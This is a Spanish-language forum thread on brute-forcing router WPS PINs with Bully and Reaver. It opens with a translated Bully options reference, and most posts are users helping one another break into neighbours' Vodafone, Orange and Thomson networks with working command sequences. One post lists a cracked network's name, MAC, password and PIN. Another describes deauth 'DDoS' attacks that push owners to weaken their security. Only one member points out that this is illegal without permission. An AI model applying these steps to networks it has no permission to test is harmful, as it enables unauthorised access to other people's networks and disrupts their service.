  -L, --lockignore       : Ignore WPS locks reported by the AP   [No]
  -M, --m57nack          : M5/M7 timeouts treated as WSC_NACK's  [No]
  -N, --nofcs            : Packets don't contain the FCS field [Auto]
  -P, --probe            : Use probe request for nonbeaconing AP [No]
  -R, --radiotap         : Assume radiotap headers are present [Auto]
  -W, --windows7         : Masquerade as a Windows 7 registrar   [No]
  -h, --help             : Display this help information


DESCRIPCIÓN DE LOS ARGUMENTOS

Código:
  -c, --channel N[,N...]

Número de canal o lista separada por comas de los canales que saltar sobre la interfaz. Algunos AP's realizan un cambio de canal periódicamente. Esta opción permite a Bully volver a adquirir un punto de acceso y continuar con un ataque sin intervención. Tenga en cuenta que la utilización de salto de canal suelen retrasar un ataque, especialmente cuando la señal del AP es débil, porque el tiempo se gasta el rastreo de canales en lugar de pasadores de prueba. Si no se proporciona ningún canal, Bully los saltará en todos los canales.

Código:
  -l, --lockwait N

Número de segundos de espera cuando un AP bloquea WPS. La mayoría de AP se bloqueará durante 5 minutos, por lo que el valor por defecto es de 43 segundos. Esto hará que Bully espere 7 veces durante un período de bloqueo para un total de 301 segundos.

Código:
  -p, --pin N

Este es el número de pin de partida (carreras secuenciales) o el índice del número de pin de partida. Normalmente, esto se maneja de forma automática, es decir, una sesión interrumpida se reanudará después de la última pin que fue probada con éxito.

Código:
  -s, --source macaddr

La dirección MAC de origen para insertar en los paquetes enviados al AP. No todas las tarjetas inalámbricas se pueden utilizar para suplantar la dirección MAC de origen de este tipo, pero la opción se proporcionan para los chipsets que lo permitan. Cuando no se proporciona, la interfaz inalámbrica recuperara la MAC Address original.

Código:
  -v, --verbosity N

Nivel de detalle. 1 es el más tranquilo, que muestra información de error sólo irrecuperable. Level 3 muestra la mayoría de la información, y es la mejor opción para determinar exactamente lo que está sucediendo durante una sesión.

Código:
  -w, --workdir

Directorio de trabajo, donde se almacenan los pins aleatorios y archivos de sesión.  ~/.Bully/

Código:
  -5, --5ghz

Utilice 5 GHz (a / n) canales en lugar de 2,54 GHz canales (b / g). No comprobado.

Código:
  -F, --fixed

Uhm, en desuso. La forma correcta de hacer esto es especificar un solo canal con --channel. Idk.

Código:
  -S, --sequential

De forma predeterminada, los pasadores son aleatorios. Esta opción permite a los pasadores para ser probados de forma secuencial.

Código:
  -T, --test

El modo de prueba. No hay paquetes se inyectan. Se puede utilizar para validar los argumentos, determinar si un punto de acceso es visible y tiene WPS habilitado, generar un archivo pin aleatorio, o crear un archivo de sesión para el punto de acceso.

Código:
  -a, --acktime N

Este tiempo de espera se utiliza cuando la espera de confirmaciones de paquetes enviados, y también se utiliza como el valor de tiempo de espera pcap. El valor predeterminado es 25 ms. Aumente este valor en los canales de alto tráfico, o si ve numerosos "envió de paquetes no reconocidos" los mensajes.

Código:
  -r, --retries N

¿Cuántas veces nos volvemos a enviar los paquetes cuando no se reconocen? El valor predeterminado es 3. La idea es hacer un mayor esfuerzo para garantizar la AP recibe todos los paquetes que enviamos, y no tienen transacciones fallan y se reinician debido a un paquete perdido.

Código:
  -m, --m13time N

Tiempo de espera para la primera baliza del AP, y WPS mensajes M1 y M3. El valor predeterminado es 2000 ms. Este es un período relativamente largo, del orden de 100 veces más largo que un acuse de recibo, porque estos mensajes implican extensa com [El Usuario ha Insultado] ción en el AP. Aumente este valor para los puntos de acceso más lentos (o más ocupados).

Código:
  -t, --timeout N

Tiempo de espera estándar para todo tipo de paquetes restantes (autenticación, asociación, petición identidad, M5 y M7). El valor predeterminado es 200 ms. Aumento en los canales ocupados / AP 's.

Código:
  -1, --pin1delay M[,N]

Retraso M segundos por cada NACK enésimo en M5. El valor predeterminado es 0,1 (sin retardo). Algunos puntos de acceso se dejen confundir por demasiadas transacciones WPS sucesivos, e incluso puede fallar si no se marcan las cosas un poco. Este es el tiempo de retardo para usar durante la primera mitad de la espiga.

Código:
  -2, --pin2delay M[,N]

Retraso M segundos por cada NACK enésimo en M7. El valor predeterminado es 0,1 (sin retardo). Algunos puntos de acceso manejan transacciones a través de M4 con facilidad, sólo para caer en demasiadas M6 mensajes sucesivos. Este es el tiempo de retardo para usar durante la segunda mitad de la espiga.

Código:
  -A, --noacks

Desactive el procesamiento de reconocimiento para todos los paquetes enviados. Útil si usted está seguro de que el AP está recibiendo paquetes, aunque bully no puede ver agradecimientos. Es posible que necesite esto para un adaptador wifi USB que procesa los reconocimientos y los deja caer antes de libpcap nunca los ve.

Código:
  -C, --nocheck

Desactive el procesamiento de secuencia de verificación de trama. Podemos mejorar el rendimiento un tanto al hacer la dudosa suposición de que todos los paquetes que recibimos son válidas. Véase también --nofcs abajo.

Código:
  -D, --detectlock

Algunos puntos de acceso no indican que se han encerrado en sus etiquetas WPS IE baliza, pero sumariamente ignoran todas las operaciones WPS durante un periodo de tiempo. Con esta opción, se puede detectar la condición y el sueño de - lockdelay segundos antes de reanudar. Con el fin de permanecer sin ser detectados, no hay ningún punto en la radiodifusión 5 minutos por valor de START mensajes EAP sin respuesta.

Código:
  -E, --eapfail

Enviar EAP FAIL mensajes después de cada transacción. Algunos de AP se confunden cuando no ven esto.

Código:
  -L, --lockignore

No haga caso de las CM condiciones de bloqueo se informa en los elementos de información de baliza.

Código:
  -M, --m57nack

Tratar M5 y M7 tiempos de espera como NACK del, para los puntos de acceso que no envían a ellos, pero en lugar de dejar caer la transacción. Al utilizar esta opción es probable que desee para aumentar el - tiempo de espera, de modo que bully no asume incorrectamente un pin es incorrecto debido a un mensaje retrasado.

Código:
  -N, --nofcs

Algunos dispositivos inalámbricos se han hecho el trabajo de la comprobación y de agotamiento de la FCS de los paquetes ya. Bully normalmente detecta y ajusta en consecuencia, pero la opción está aquí, si usted necesita a la fuerza.

Código:
  -P, --probe

Bully utiliza balizas para examinar la WPS estado de un punto de acceso. Para nonbeaconing AP, enviar solicitudes de sondeo dirigido y utilizar las respuestas muestra que resulten en su lugar. Requiere --essid.

Código:
  -R, --radiotap

Supongamos encabezados radiotap están presentes en los paquetes recibidos. Esto es útil en los casos en que la presencia de cabeceras radiotap está mal informada o detectado.

Código:
  -W, --windows7

Pasar por un registro de Windows 7.

Código:
  -h, --help

Muestra la ayuda en pantalla.

DESCARGAS

Binario: https://code.google.com/p/bully/downloads/detail?name=bully&can=2&q=
Source Code: https://github.com/bdpurcell/bully/archive/master.zip


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 8 Agosto 2013, 18:39 pm
Muchas gracias por la información  P4nd3m0n1um yo ya conocía este programa viene como modulo en el wifislax 4.6 y la verdad que no se como hacerlo funcionar metí este Código:
  -c, --channel N[,N...]

que viene y no me hace nada no lo entiendo -c y puese aqui el canal del AP que quiero atacar pero no se por que me salta con un mensaje como diciendo que no esta bien puesto algo si sabéis alguno como funciona decirlo por fa quiero probarlo por lo que dice es muy parecido al reaver no se que diferencia tiene lo veo parecido.Saludos ;D ;D ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 8 Agosto 2013, 20:06 pm
Hola , parece una loteria , y por ahora el reaver que utilizamos en wifislax 4.6 parece más efectivo por que empieza por los pins conocidos .
La única efectividad que le veo es que el pin sea de los más altos 9996xxxx  y lo saque antes que reaver .


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 9 Agosto 2013, 17:53 pm
Entonces me quieres decir que este programa que viene como modulo en el wifislax 4.6 también puede ser mas efectivo que el reaver normal aunque en el otro ya se aparecen los pins conocidos  hombre si tienes ma pines posibles se supone que tenemos mas probabilidad de sacar antes la clave en router a lo mejor que no hemos sacado todavía verdad, tu ya lo has probado ?' en el wifislax a ti te funciona es que resulta que meti el primer comando y ami no me funciona el programa ni nada no se que abre echo mal si tu sabes dimelo por fa para probarlo.Saludos ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 9 Agosto 2013, 22:07 pm
Pruebalo en wifislax 4.6,funciona , ( has metido el módulo en la carpeta modules ,en wifislax sale un icono de bully en wpa wps ), una de las formas :
airmon-ng start wlan0
wash -i mon0 -C ( ves los ruoter con wps activado ) y Ctrl+c
bully mon0 -b la que sea -c  el que sea  -e el que sea
Con esto te funciona , ya luego en otras pruebas le puedes ir poniendo otros   comandos de bully.
 Tambien puedes utilizar otras herramientas que trae wifislax para reaver , que en definitiva lo que hacen es poner la tarjeta en monitor y utilizar wash ( lo que te explicado arriba por comandos , por ejemlo inflator goyscript wps etc. pero sin lanzr reaver , con ellos abiertos abres una consola y
 bully mon0 -b la que sea -c  el que sea  -e el que sea

Con respecto a la  pregunta que me haces , lo que digo que a mi personalmente me gusta mas el  reaver  de  wifislax que el bully , ademas puedes hacer la prueba , si el router a probar tiene un pin conocido ,te saldrá pronto , en bully lo mismo tarda 27 horas , otro ejemplo , imaginemos que pruebas con un router que tiene el pin bajo 11045150 , rever te lo sacará relativamente pronto , bully lo mismo te dice que te quedan 22 horas .
Solo en el caso de ser un pin alto , que reaver tardaría bastante , lo mismo bully por tirar pins a voleo ( por lo menos lo aparenta ) tengas la suerte de que de el pin antes que reaver


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: JESVIS en 10 Agosto 2013, 12:35 pm
Hola a todos... yo quería saber si alguno sabe como sacar la clave wpa una vez que tienes el pin wps... y tambien saber que se puede hacer cuando los ruter limitan los intentos... siempre sale lo del limite y ya no se puede hacer nada... gracias y un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Agosto 2013, 01:44 am
Popeye7: Si lo meti en carpeta modules y es lo que te digo dentro del wifislax 4.6 me dice que tengo que ponerlo en modo monitor y yo lo lo tengo en modo monitor, are lo que tu me dices haber si me sale bien y te comento haber si tengo mas suerte que en el reaver normal. ;) ;D


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NewAlex en 11 Agosto 2013, 20:30 pm
acabo de crackear una red de vodafone, conecto bien a la red veo con el ranlink la IP y me pone conectado,  pero al intentar ir al 192.168.1.1 o google.es no transfiere datos, la conexión es excelente entre 50 y 60. Si fuera por algun filtro mac no se me conectaria al router creo. algun idea?

RED  : vodafone641E
MAC  : 6A:23:3D:36:64:1C
PASS : NLXJTPDHZWBTSF
PIN  : 35645726

de todos modos tengo otra red vodafone al alcance , ire sacandole la pass aver si se comporta igual que la otra.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: freelhx en 14 Agosto 2013, 16:09 pm
RT2870, funciona con reaver?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 14 Agosto 2013, 22:36 pm
Si funciona , con wash tienes que poner -C , en inflator tener la casilla -C activada.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NEXUS978 en 15 Agosto 2013, 01:47 am
Con el Reaver modificado por Notepad me da el 100,00% completado pero no me da la pass.
No entiendo...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 15 Agosto 2013, 09:15 am
y si le metes : reavermod -i mon0 -b    -c   -pXXXXXXXX -vv tampoco ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: freelhx en 15 Agosto 2013, 15:20 pm
Si funciona , con wash tienes que poner -C , en inflator tener la casilla -C activada.

Gracias Popeye.

Reaver me asocia pero me da el error 0x02

Me falla algo ?
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 11 -p 00000000 -vv


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NEXUS978 en 15 Agosto 2013, 17:49 pm
y si le metes : reavermod -i mon0 -b    -c   -pXXXXXXXX -vv tampoco ?
Efectivamente, de hecho le meto ese comando y es como cuando se te queda con el 99'99% pero mostrando el 100,00% completado sin que la pass aparezca por ningun  lado.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 15 Agosto 2013, 19:01 pm
yo te decía que  el pin de 8 cifras que tengas tenia que recuperarte la key con el revermod  ,por que si lo intentas con el comando reaver y es un pin no checksum aunque tengas el pin correcto no te la da , te cambia el último digito  , en cambio el reavermod si lo consigue .
¿ que mac tiene ? hay algunas por los foros donde el reaver normal y mod  llegan al 100% y no dan la clave por  ejemplo el 20:F3:A3 es un Huawei 3G WIRELESS GATEWAY (WLAN_XXXX)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 15 Agosto 2013, 19:07 pm
Puede ser que haya que modificar otro reaver de forma distinta a los ampers o una proteccion del router que no suelta la clave pueden ser mil cosas si te pones a pensar.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NEXUS978 en 15 Agosto 2013, 20:00 pm
Es un 8C:0C:A3:XX:XX:XX/Wlan_XXXX por supuesto, el router un Amper


El ultimo pin que se queda probando el ReaverMod es el 25409998

Lo digo porque he probado por si acaso a meter ese pin en el Reaver normal y no me lo reconoce, me salta directamente a 25409994

Eso si, me pregunto si mi fallo podria estar aqui:

-Utilizo la opcion Reaver Test Pin dentro del programa QTWSPIN
y se me pone en 90.01% hasta que llega al famoso 99'99%

-Cuando utilizo el ReaverMod de Notepad introduzco los 4 primeros pines que me daba el Reaver Test Pin, si este me a dado el 2540xxxx le meto -p 2540 y asi continua probando pins hasta llegar a este 100% completado que no me da la contraseña.

-Aque llegados..se daria la posibilidad de que aunque me haya completado el 100% los cuatro primeros digitos que me daba el Reaver Test Pin no fueran los correctos?

-Y entonces kizas lo que habria que hacer es comenzar con Reavermod desde el inicio sin meter ningun -p?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 15 Agosto 2013, 21:11 pm
Creo que es lo que dices , pero parece que tarda menos con inflator hasta que te de el 90% con los 4 primeros digitos del pin ,los apuntas y cierras y luego reavermod  -p xxxx .
Ya sabes si es un pin alto ,hay que echarle bastantes horas , tambien depende de los segundos que tarde en cada pin.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NEXUS978 en 15 Agosto 2013, 22:14 pm
Gracias Popeye, probare.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 17 Agosto 2013, 16:51 pm
Tendrias que empezar de nuevo seria recomendable este router es vulnerable se ha comentado ya.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NEXUS978 en 22 Agosto 2013, 06:10 am
Las buenas noticias que tengo es que con el Reaver normal me da unos 4 primeros pines al 93% diferentes de los que me daba Reaver test pin

Y que ahora por ejemplo una vez que meto esos 4 primeros pines en el reavermod de notepad me tira el m5 y el m6 antes no lo hacia y tengo entendido que te los tiene que tirar para que suelte la pass.

Lo unico que pensaba que el reavermod continuaba desde ese 93%, me a pegado un pequeño bajon cuando he visto que partia del 50'03% de nuevo :-\

Pero con mucha paciencia y alegria....
Ya os contare


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NEXUS978 en 22 Agosto 2013, 22:21 pm
Bueno gente os comento: Objetivo cumplido.
Gracias por vuestros consejos.

Como este foro esta para que aprendamos entre todos mi consejo basado en esta experiencia es que no os fieis de Reaver test Pin es mejor que lo inicieis con el Reaver normal desde el principio por muy lento que vaya, al final la mezcla de este y del Reaver de Notepad hacen que sea completamente efectivo.

Ademas de que la posibilidad que da la nueva version de Wifislax 4.6 de salvar las sesiones facilita mucho la tarea. ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 23 Agosto 2013, 16:19 pm
Hey encontre esto en internet lo pongo para que lo veais

  • Waiting for beacon from C0:3F:0E:BB:23:8E
  • Switching wlan0 to channel 11
  • Associated with C0:3F:0E:BB:23:8E (ESSID: Orange)
  • Trying pin 53363480
  • Key cracked in 4 seconds
  • WPS PIN: '53363480'
  • WPA PSK: 'VM1AsogutopuYnoke7kAJ'


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 24 Agosto 2013, 04:37 am
Que rara es esa clave tiene 21 digitos nunca lo he visto ni me suena la mac de donde lo sacaste la fuente. Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 24 Agosto 2013, 22:35 pm
He visto este video en youtube y nose si sera fake o es cierto.
http://www.youtube.com/watch?v=ypACOjflA2I#t=10


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 26 Agosto 2013, 01:35 am
He visto este video en youtube y nose si sera fake o es cierto.
http://www.youtube.com/watch?v=ypACOjflA2I#t=10

En realidad Tactical Network Solutions estaba trabajando en la 2da versión de ReaverPRO: http://www.tacnetsol.com/reaver/


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jn02 en 31 Agosto 2013, 17:34 pm
joooo con las redes orange alguien a sacado alguna con reaver estoy liado con una y el porsenteje se repite mucho asta subir a otro es normal. ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 31 Agosto 2013, 20:00 pm
Al parecer nadie consiguio nada de orange pero hay un truco en bully y reaver para que no se bloqueen es un comando que pones para que no se bloquee es un tiempo de espera lo ajustas al tiempo que quieras.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 31 Agosto 2013, 20:01 pm

Para todos los que tenemos router orange-xxxx seguridad wpa2, utilizando el comando -r x:y, siendo la X el número de intentos pin, e Y el tiempo de suspensión para continuar con los intentos.

Con este comando evitamos el bloqueo por defecto de nuestro router a los 15 intentos de pin, ya que alos 450 segundos el router pondria a cero, dicho número de intentos.


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 31 Agosto 2013, 20:13 pm
¿estas seguro de eso?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 31 Agosto 2013, 20:16 pm
Algun truco debe tener no tantos comandos que hay en bully y reaver serviran para algo.


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 31 Agosto 2013, 20:54 pm
El tema es que los router de orange te bloquean por numero de pines .  Da igual los comandos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Rosarioflores en 1 Septiembre 2013, 08:30 am
buenos dias, como es mi primer post queria daros mi enhorabuena por la interensatisima web que haceis entre todos.

despues de leerme muchos post, (lo primero que hice fue deshabilitar wps de mi vulnerable router Ono) Y como me gusta trastear he comenzado con goyscript un ataque a un router thomson 00:26:44 que va por el 36% y como va muy muy lento porque el dichoso router se bloquea.

estoy en modo live usb y por mas que leono sé recuperar la versión guardada, me gustaria saber si existe algun comando para que el goyscript comienza a probar pines apartir del por ejemplo pin 3746XXXX.

Un saludo y muchas gracias de antemano


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 1 Septiembre 2013, 18:02 pm
Hola rosarioflores me alegro que te haya registrado en este foro pues haber te comento el goyscript que viene dentro del wifislax4.6 por ejemplo que yo sepa no se puede poner este comando --pin=3746 y que el resto lo busque no se puede por que va directamente a sacar la clave con los pin que estén soportado en esa herramienta y si no lo encuentra empieza hacer fuerza bruta con el reaver entonces la unica solución que yo veo es que cojas y utilices el reaver 1.4 que viene dentro del wifislax 4.6 y  pongas el siguiente comando:
Código:
reaver -i mon0 -b 00:11:22:33:44:56 --pin=XXXX -vv


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 1 Septiembre 2013, 18:34 pm
Hola

En esa linea sobra 1 "-" y el símbolo "+" . Es

-p xxxx

Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 2 Septiembre 2013, 00:13 am
Perdona que te diga también funciona con --pin=XXXX y poner esto -vv a mi me funcionar en el reaver 1.4  Y OTRA COSA EL 1 DE DONDE LO SACAS si -i


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 2 Septiembre 2013, 00:38 am
El 1 es "un" que sobra un "-" .

Y que mas da que te funcione, sobra igual te funcione o no

El -vv es para que muestre el proceso completo con errores y aciertos , nada que ver con el pin


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Rosarioflores en 2 Septiembre 2013, 07:48 am
Muchas gracias chicos.  Ojala pueda reportar resultados positivos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 2 Septiembre 2013, 13:22 pm
Este metodo de atque ddos funciona  100% por lo menos a mi en las redes que lo usado pero hay que tener paciencia dejarlo muchas horas tenia una vodafonexxxx wpa y el propietario cambio a wep pk use este ataque probarlo muchas horas y vereis como al final el propietario se cansa y se cree que es un error una ono tenia el wps desactivado y se lo activo de nuevo gracias Elsevi tienes toda la razon funciona hacer caso


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 2 Septiembre 2013, 15:10 pm
Hola

Las Vodafone no se bloquean y el pin es conocido, por tanto en menos de un segundo caen.

Las ono tampoco se bloquean por tanto es cuestión de lanzar reaver y esperar.

¿a que ataque DDos te refieres?  A tumbar la red hasta que su dueños reinicie el router .  Eso es ilegal, solo se pueden auditar redes propias o con permisos para hacerlo .  

Orange bloquea el wps cada 15 pines (algunos modelos) o cada 8.  Si estamos hablando que el numero de pines a pasar son 9999999+la suma checksum, estamos hablando que el dueño tendría que reiniciar el router 666666,6 veces .  ¿tu no llamarías antes al servicio técnico?  

Ese método no es científicamente valido

Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Rosarioflores en 2 Septiembre 2013, 17:43 pm
A ver os comento, en 5 o 6 post anteriores post pregunte como me podia asociar a una red pero empezando desde un determinado pin, puse el comando qme pusieron los compañeros y me logro asociar con la red con el reaver 1.4 pero ya no pasa de ahi, se queda el reaver parado de qesta asociado y ya esta y mi duda seria qsi tengo qir despues al goyscript y ya empezaria por el ping qle puse en el reaver anteriormente? O es qtengo qponer algo mas en el reaver? Muchas gracias


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 2 Septiembre 2013, 18:14 pm
Hola

Como sabes reaver busca primero los 4 primeros dígitos y cuando los tiene va a por los 3 últimos. Bien sabiendo esto puedes usar

reaver -i mon0 -b bssid -pxxxx -vv

De esta forma reaver empezara desde esos 4 dígitos y seguirá el orden dando esos 4 por buenos y solo buscara los 3 últimos , pero si esos 4 primeros no son validos llegara al 99% y se quedara ahí. Y si pones el pin completo 1234567 solo probara ese (mas checksum)  infinitamente ya que reaver lo da por bueno .

Si lo que quieres es hacer la sesión en varias partes (y por eso quieres continuar desde un pin concreto).  Instalala en hd y así cada vez que lances reaver seguirá por donde ibas.  O usa los cambios persistentes en modo live y así también podrás guardar la sesión


Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 2 Septiembre 2013, 19:26 pm
Sanson ya se que no se bloquean las vodafone pero yo solo le he contado mi experiencia que el que quiera probar esto que lo prueben que a mi me ha ido muy bien nada mas saludos.


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 2 Septiembre 2013, 19:41 pm
Hola

Es que te e preguntado por que sigo sin saber a que te refieres, con. Lo del DDoS . Na da mas.  Como le has dado las gracias a elsevi e revisado los post y no e visto el porque.  Por eso te e preguntado a que te referidas con el DDoS que funciona

Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 2 Septiembre 2013, 19:41 pm
Sanson ya se que no se bloquean las vodafone pero yo solo le he contado mi experiencia que el que quiera probar esto que lo prueben que a mi me ha ido muy bien nada mas saludos.
Perdon que te corrija pero las vodafoneXXXX si que se bloquean. Tengo una a mi alcance con mac 5C:4C:A9 y lleva bloqueada ni se sabe. Bueno nose si exactamente esta bloqueada, porque me deja asociarme y lanza el primer pin pero se queda en  M2, es decir, tengo el pin completo y al ponerlo en reaver sale el M1 y el M2 y se queda como dos segundos pensando y nunca sale el M3. Eso es normal en estas macs?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 2 Septiembre 2013, 19:49 pm
Pues lleváis razón adrihamel yo también intente alguna vodafon y también se bloquea el router claro si te sabes el pin lo sacas rápido es verdad que la mayoría  de esto router se saca con facilidad pero no todos yo lo he comprobado con el reaver.Si no podéis sacarlo con el diccionario que hay de betis jesus que hace claves aleatorias pero es cuestión de suerte.Saludos.

Lo del ataque DDoS  yo tampoco lo entiendo a que te refieres goolden no he dicho nada eso. si no es asín corrígeme.


Título: Re: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: sanson en 2 Septiembre 2013, 21:36 pm
Vodafone=wpspingenerator

Y san seacabo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 2 Septiembre 2013, 22:26 pm
Elsevi me refiero que lo has comentado en el foro para quitar el bloqueo de las orange un tema que hay abierto por eso te doy las gracias que tienes razon que funciona para que el propietario ponga wep o reinicie el router tambien.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 2 Septiembre 2013, 22:35 pm
Ah porcierto por vuestra zona teneis jazztel_xxxx voy abrir un tema sobre esto y me gustaria que  pongais si tiene el wps activado y los datos que podais bueno el que quiera que aporte saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 2 Septiembre 2013, 23:59 pm
Citar
Elsevi me refiero que lo has comentado en el foro para quitar el bloqueo de las orange un tema que hay abierto por eso te doy las gracias que tienes razon que funciona para que el propietario ponga wep o reinicie el router tambien.

aaam vale si lo publique yo aquí y te servio para desbloquea el router de las orange dimee si es me alegro mucho sirve en algunas en otras es dificil.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 3 Septiembre 2013, 12:52 pm
Si me ha servido para todas las orange que lo he probado y a ti te funciona incluso para las vodafone funciona le afecta mucho saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 3 Septiembre 2013, 12:55 pm
Yo lo que hago es combinar el ddos con otros ataques y asin es mas efectivo y le afecta mas a mi router vodafone le afecta mogollon se sobrecarga mucho  mdk3 tiene muchos ataque efectivos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 5 Septiembre 2013, 08:45 am
Oye te importa decirme los pasos que tu sigues para hacer eso que tu haces por privado o por aquí como tu quieras.Saludos ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 5 Septiembre 2013, 18:07 pm
Mira el problema que tengo con una de vodafone es este.
(http://www.subirimagenes.com/privadas-vodafone-2117379.html)
http://www.subirimagenes.com/privadas-vodafone-2117379.html Se queda en M1, M2 y vuelve al M1 y el pin es ese. Eso esque el router esta bloqueado?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 9 Septiembre 2013, 02:57 am
He visto el problema que tienes una de dos el pin no es correcto y tu dices que si seguro o la señal la tienes lejos y te tienes que acercar mas al router o la otra opción que tu dices es que se ha bloqueado el router puede ser también pero no te pasa de M1,M2 dejale tiempo haber si lanza el M3,M4  es raro que si te sabes el pin no te saque la clave si te sabes el pin entonces no tiendo para que quieres sacar la clave si ya la tendrás verdad. :¬¬ ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: buite en 9 Septiembre 2013, 03:45 am
aaam vale si lo publique yo aquí y te servio para desbloquea el router de las orange dimee si es me alegro mucho sirve en algunas en otras es dificil.

Perdonarme, pero a mí también me interesa el tema de las Orange y no localizo donde lo publicaste Elsevi.

¿me puedes poner el enlace?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 9 Septiembre 2013, 11:43 am
buite: Toma aqui tienes el enlace haber si tienes suerte: http://foro.elhacker.net/wireless_en_linux/desactivar_el_bloqueo_de_las_orangexxxx-t379424.0.html ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 9 Septiembre 2013, 16:56 pm
He visto el problema que tienes una de dos el pin no es correcto y tu dices que si seguro o la señal la tienes lejos y te tienes que acercar mas al router o la otra opción que tu dices es que se ha bloqueado el router puede ser también pero no te pasa de M1,M2 dejale tiempo haber si lanza el M3,M4  es raro que si te sabes el pin no te saque la clave si te sabes el pin entonces no tiendo para que quieres sacar la clave si ya la tendrás verdad. :¬¬ ;)
El pin le he sacado con el programa wpscrackgui, y se supone que paras las vodafone, cuando pones el bssid y el essid (siempre que este soportada la mac) te da un pin correcto no? Ya he sacado varias de vodafone y todo muy bien pero esta con mac 5c:4c:a9 y otra con mac 20:2b:c1 se quedan en el M2 y no me da la clave. Ambos routers los tengo cerca con señal -54 y -60 respectivamente. Llevo como desde febrero o asi con ambas intentando sacar la clave pero siguen bloqueadas desde entonces. Y la clave la necesito para onectarme en windows o hay algun programa que con el pin te diga cual es su clave?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NEXUS978 en 10 Septiembre 2013, 00:19 am
Pues yo estoy ahora probando con un Thompson que se queda bloqueado durante 70 segundos tras unos cuantos intentos, el problema es que no avanza, es como si el programa no podria con este "bloqueo"


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: NewAlex en 10 Septiembre 2013, 00:38 am
